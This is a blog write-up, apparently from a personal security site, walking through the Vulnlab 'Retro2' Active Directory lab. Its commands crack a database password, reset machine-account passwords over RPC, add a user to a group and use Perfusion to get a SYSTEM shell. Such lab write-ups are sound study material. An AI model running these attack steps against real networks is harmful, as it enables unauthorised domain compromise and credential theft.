<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account AbuseIn this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate">
<meta property="og:type" content="article">
<meta property="og:title" content="VL-Retro2">
<meta property="og:url" content="https://panosoikogr.github.io/2025/03/14/VL-Retro2/index.html">
<meta property="og:site_name" content="Panosoiko Cybersecurity Blog">
<meta property="og:description" content="Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account AbuseIn this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://panosoikogr.github.io/images/Retro2/guest0smb2.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Retro2/public-shares.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Retro2/john-crack.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Retro2/bloodhound.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Retro2/fs01-account.png">
<meta property="article:published_time" content="2025-03-14T14:48:24.000Z">
<meta property="article:modified_time" content="2025-05-23T10:42:15.180Z">
<meta property="article:author" content="Panosoiko">
<meta property="article:tag" content="VL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://panosoikogr.github.io/images/Retro2/guest0smb2.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/web-app-manifest-192x192.png">
        
      
    
    <!-- title -->
    <title>VL-Retro2</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-73BMC8ZHB7"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-73BMC8ZHB7');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/03/16/VL-Baby2/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/03/11/VL-Retro/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2025/03/14/VL-Retro2/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&text=VL-Retro2"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&is_video=false&description=VL-Retro2"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VL-Retro2&body=Check out this article: https://panosoikogr.github.io/2025/03/14/VL-Retro2/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&name=VL-Retro2&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&t=VL-Retro2"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Vulnlab-Retro2-Legacy-Windows-Server-2008-R2-Exploitation-Through-Database-Credential-Extraction-and-Machine-Account-Abuse"><span class="toc-number">1.</span> <span class="toc-text">Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account Abuse</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap"><span class="toc-number">1.1.</span> <span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-exploit"><span class="toc-number">1.2.</span> <span class="toc-text">Fast exploit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Foothold"><span class="toc-number">1.3.</span> <span class="toc-text">Foothold</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bloodhound"><span class="toc-number">1.3.1.</span> <span class="toc-text">Bloodhound</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#User"><span class="toc-number">1.3.2.</span> <span class="toc-text">User</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#GenericWrite"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">GenericWrite</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#AddMember"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">AddMember</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Priv-Escalation"><span class="toc-number">1.4.</span> <span class="toc-text">Priv Escalation</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        VL-Retro2
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Panosoiko</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-03-14T14:48:24.000Z" class="dt-published" itemprop="datePublished">2025-03-14</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/VL/" rel="tag">VL</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Vulnlab-Retro2-Legacy-Windows-Server-2008-R2-Exploitation-Through-Database-Credential-Extraction-and-Machine-Account-Abuse"><a href="#Vulnlab-Retro2-Legacy-Windows-Server-2008-R2-Exploitation-Through-Database-Credential-Extraction-and-Machine-Account-Abuse" class="headerlink" title="Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account Abuse"></a>Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account Abuse</h1><p>In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Retro2” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous SMB access and password-protected Access database cracking, we’ll progress through LDAP enumeration, machine account password manipulation, and ultimately achieve SYSTEM-level access via Windows Registry RPC endpoint mapper privilege escalation. This penetration test showcases several real-world Active Directory attack vectors including guest account enumeration, database credential extraction, machine account exploitation, GenericWrite abuse for password resets, group membership manipulation, and leveraging legacy Windows vulnerabilities for local privilege escalation. The techniques demonstrated highlight common security misconfigurations in older Windows environments that penetration testers should look for during enterprise assessments.</p>
<h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">PORT      STATE SERVICE      REASON          VERSION</span><br><span class="line">53/tcp    open  domain       syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)</span><br><span class="line">| dns-nsid: </span><br><span class="line">|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)</span><br><span class="line">88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos </span><br><span class="line">135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line">139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)</span><br><span class="line">445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)</span><br><span class="line">464/tcp   open  kpasswd5?    syn-ack ttl 127</span><br><span class="line">593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp   open  tcpwrapped   syn-ack ttl 127</span><br><span class="line">3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp  open  tcpwrapped   syn-ack ttl 127</span><br><span class="line">49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line">49155/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line">49157/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2025-03-11T18:29:27</span><br><span class="line">|_  start_date: 2025-03-11T18:27:35</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   2:1:0: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line">| p2p-conficker: </span><br><span class="line">|   Checking for Conficker.C or higher...</span><br><span class="line">|   Check 1 (port 22122/tcp): CLEAN (Timeout)</span><br><span class="line">|   Check 2 (port 47750/tcp): CLEAN (Timeout)</span><br><span class="line">|   Check 3 (port 39335/udp): CLEAN (Timeout)</span><br><span class="line">|   Check 4 (port 23565/udp): CLEAN (Timeout)</span><br><span class="line">|_  0/4 checks are positive: Host is CLEAN or ports are blocked</span><br><span class="line">| smb-security-mode: </span><br><span class="line">|   account_used: guest</span><br><span class="line">|   authentication_level: user</span><br><span class="line">|   challenge_response: supported</span><br><span class="line">|_  message_signing: required</span><br><span class="line">| smb-os-discovery: </span><br><span class="line">|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)</span><br><span class="line">|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1</span><br><span class="line">|   Computer name: BLN01</span><br><span class="line">|   NetBIOS computer name: BLN01\x00</span><br><span class="line">|   Domain name: retro2.vl</span><br><span class="line">|   Forest name: retro2.vl</span><br><span class="line">|   FQDN: BLN01.retro2.vl</span><br><span class="line">|_  System time: 2025-03-11T19:29:28+01:00</span><br><span class="line">|_clock-skew: mean: -2h19m57s, deviation: 34m36s, median: -1h59m59s</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)</p>
<h2 id="Fast-exploit"><a href="#Fast-exploit" class="headerlink" title="Fast exploit"></a>Fast exploit</h2><p>We can see that its Windows Server 2008 R2 trying the most basic exploits for this version we see that its vulnerable to <code>nopac</code> and <code>zerologon</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb BLN01.retro2.vl -M zerologon</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb BLN01.retro2.vl -u &quot;user&quot; -p &quot;pass&quot; -M nopac</span><br></pre></td></tr></table></figure>
<p>There are plenty tutorials for how to use <code>zerologon</code> and the <code>nopac</code> exploits this blog post will focus on the “intended way”</p>
<h2 id="Foothold"><a href="#Foothold" class="headerlink" title="Foothold"></a>Foothold</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb 10.10.100.199 -u &#x27;guest&#x27; -p &#x27;&#x27; --shares</span><br></pre></td></tr></table></figure>
<p><img src="/images/Retro2/guest0smb2.png" alt="guest0smb2"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient //10.10.100.199/Public -U &#x27;guest&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="/images/Retro2/public-shares.png" alt="public-shares"><br>There is one file in the DB folder named <code>staff.accdb</code> we will download that file to our system</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get staff.accdb</span><br></pre></td></tr></table></figure>
<p>The <code>.accdb</code> is a is an <em>Access 2007&#x2F;2010 Database file</em> used in and opened by Access 2007+, we can use office2john to get the hash and crack it as its password protected</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">office2john staff.accdb</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --format=office --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</span><br></pre></td></tr></table></figure>
<p><img src="/images/Retro2/john-crack.png" alt="john-crack"><br>Using the password <code>class08</code>, we unlock the microsoft access database:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ldapreader:&lt;REDACTED&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bloodhound-python -u &quot;ldapreader&quot; -p &quot;&lt;REDACTED&gt;&quot; -d retro2.vl -dc BLN01.retro2.vl -ns 10.10.70.92 -c ALL --zip</span><br></pre></td></tr></table></figure>
<p>OR</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc ldap retro2.vl -u &#x27;ldapreader&#x27; -p &#x27;&lt;REDACTED&gt;&#x27; --bloodhound --dns-server &lt;ip&gt; -c All --dns-tcp</span><br></pre></td></tr></table></figure>
<p>The above command will get us a zip file that we will use on bloodhound and find our exploitation path<br><img src="/images/Retro2/bloodhound.png" alt="bloodhound"></p>
<h3 id="User"><a href="#User" class="headerlink" title="User"></a>User</h3><p>First we will try to use the username as the password lowercase for the machine account <code>fs01$</code>(Refer to this blog post that describes why this happens <a target="_blank" rel="noopener" href="https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/">https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/</a>)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb retro2.vl -u &#x27;fs01$&#x27; -p &#x27;fs01&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="/images/Retro2/fs01-account.png" alt="fs01-account"><br>we need to change the password so we can use that machine account with the password</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-changepasswd &#x27;retro2.vl/fs01$&#x27;:&#x27;fs01&#x27;@retro2.vl -newpass StrongP@ss1234 -dc-ip BLN01.retro2.vl -p rpc-samr</span><br></pre></td></tr></table></figure>
<h4 id="GenericWrite"><a href="#GenericWrite" class="headerlink" title="GenericWrite"></a>GenericWrite</h4><p>We have control over FS01, we can take advantage of the <strong>GenericWrite</strong> permission we previously identified. Typically, this permission can be abused using one of the following techniques:</p>
<ul>
<li><strong>Shadow Credentials</strong> (applicable to Windows Server 2016 and later)</li>
<li><strong>Targeted Kerberoasting</strong> (only effective if the target’s password is weak and crackable)</li>
<li><strong>Resource-Based Constrained Delegation</strong></li>
</ul>
<p>As we are dealing with a Windows Server 2008 none of them will work so we will use another way we can modify another attribute <strong>unicodePwd</strong> which allows us to reset the password for <strong>“ADMWS01$”</strong> (Big thanks to serotonin for this exploitation path <a target="_blank" rel="noopener" href="https://seriotonctf.github.io/2024/08/25/Retro2-Vulnlab/">https://seriotonctf.github.io/2024/08/25/Retro2-Vulnlab/</a> )</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net rpc password &#x27;ADMWS01$&#x27; Passw0rd1 -U retro2.vl/&#x27;fs01$&#x27;%StrongP@ss1234 -S BLN01.retro2.vl</span><br></pre></td></tr></table></figure>

<h4 id="AddMember"><a href="#AddMember" class="headerlink" title="AddMember"></a>AddMember</h4><p>We will add the user we own <code>ldapreader</code> to the group <code>Services</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net rpc group addmem &quot;Services&quot; &quot;ldapreader&quot; -U &quot;retro2.vl&quot;/&quot;ADMWS01$&quot;%&quot;Passw0rd1&quot; -S BLN01.retro2.vl</span><br></pre></td></tr></table></figure>
<p>Then we can just RDP to the machine:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xfreerdp /v:10.10.70.92 /u:&#x27;ldapreader&#x27; /p:&#x27;&lt;REDACTED&gt;&#x27; /d:retro2.vl /tls-seclevel:0</span><br></pre></td></tr></table></figure>

<h2 id="Priv-Escalation"><a href="#Priv-Escalation" class="headerlink" title="Priv Escalation"></a>Priv Escalation</h2><p>There is a great blog post by <a target="_blank" rel="noopener" href="https://itm4n.github.io/">itm4n</a> on a no-fix vulnerability<br>    <a target="_blank" rel="noopener" href="https://itm4n.github.io/windows-registry-rpceptmapper-eop/">https://itm4n.github.io/windows-registry-rpceptmapper-eop/</a><br>    <a target="_blank" rel="noopener" href="https://itm4n.github.io/windows-registry-rpceptmapper-exploit/">https://itm4n.github.io/windows-registry-rpceptmapper-exploit/</a></p>
<p>Now with a tool named <a target="_blank" rel="noopener" href="https://github.com/itm4n/Perfusion">Perfusion</a> we can get a system shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\Perfusion.exe -c cmd -i</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://api.vulnlab.com/api/v1/share?id=bec17ffc-be95-49d1-915e-35c53826e85f" title="https://api.vulnlab.com/api/v1/share?id=bec17ffc-be95-49d1-915e-35c53826e85f">https://api.vulnlab.com/api/v1/share?id=bec17ffc-be95-49d1-915e-35c53826e85f</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writeups</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/tags/">Tags</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Vulnlab-Retro2-Legacy-Windows-Server-2008-R2-Exploitation-Through-Database-Credential-Extraction-and-Machine-Account-Abuse"><span class="toc-number">1.</span> <span class="toc-text">Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account Abuse</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap"><span class="toc-number">1.1.</span> <span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-exploit"><span class="toc-number">1.2.</span> <span class="toc-text">Fast exploit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Foothold"><span class="toc-number">1.3.</span> <span class="toc-text">Foothold</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bloodhound"><span class="toc-number">1.3.1.</span> <span class="toc-text">Bloodhound</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#User"><span class="toc-number">1.3.2.</span> <span class="toc-text">User</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#GenericWrite"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">GenericWrite</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#AddMember"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">AddMember</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Priv-Escalation"><span class="toc-number">1.4.</span> <span class="toc-text">Priv Escalation</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2025/03/14/VL-Retro2/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&text=VL-Retro2"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&is_video=false&description=VL-Retro2"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VL-Retro2&body=Check out this article: https://panosoikogr.github.io/2025/03/14/VL-Retro2/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&title=VL-Retro2"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&name=VL-Retro2&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2025/03/14/VL-Retro2/&t=VL-Retro2"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Panosoiko
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
